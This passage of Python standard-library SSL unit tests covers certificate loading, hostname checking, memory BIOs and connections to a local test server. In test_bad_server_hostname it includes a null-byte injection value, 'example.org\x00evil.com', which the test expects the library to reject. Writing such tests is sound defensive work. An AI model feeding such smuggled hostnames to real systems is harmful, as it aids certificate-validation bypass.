def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED again
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
def test_num_tickets(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
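# ssl.MemoryBIO is an in-memory byte buffer with explicit EOF handling;
# it is the transport used by SSLObject when no real socket is involved.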
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
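# There is no real socket here, so the test pumps the handshake by hand:
# ciphertext written to one side's outgoing BIO is copied into the other
# side's incoming BIO after each do_handshake() attempt.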
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple I/O loop: call func(*args) and, depending on the error we
# get (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
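# 'incoming' feeds ciphertext read from the socket into the SSLObject,
# 'outgoing' collects ciphertext the SSLObject wants sent; ssl_io_loop()
# shuttles the bytes between the BIOs and the real socket.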
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
